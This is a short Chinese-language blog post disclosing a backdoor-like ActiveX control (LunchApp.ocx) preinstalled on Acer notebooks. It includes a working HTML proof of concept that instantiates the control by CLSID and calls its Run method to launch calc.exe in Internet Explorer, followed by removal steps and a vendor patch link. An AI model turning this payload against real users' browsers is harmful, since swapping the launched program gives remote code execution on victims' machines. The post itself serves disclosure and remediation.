有acer notebook的朋友 福氣啦~ 原廠附贈後門一隻
檢查硬碟裡有C:\windows\system\LunchApp.ocx的話,就恭喜囉..

POC: 把下面內容存成.htm,用ie打開(要enable activex)會跑計算機起來就再次恭喜...

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>


解決方法: 1.把C:\windows\system\LunchApp.ocx刪除或改名
2.還相信原廠patch的話 ftp://ftp.support.acer-euro.com/utilities/LaunchAppFix/AcerLAppFix.zip

延伸閱讀:
About Acer Notebook LunchApp.APlunch ActiveX Control....
天阿.. 2006.11.19就有人發佈囉..
Dangerous backdoor in Acer laptops [Update]
Acer 'preloads vulns' onto notebooks

收進你的MyShare個人書籤
創作者介紹

Sylphid的隨意鳥地方

sylphidsu 發表在 痞客邦 PIXNET 留言(0) 人氣()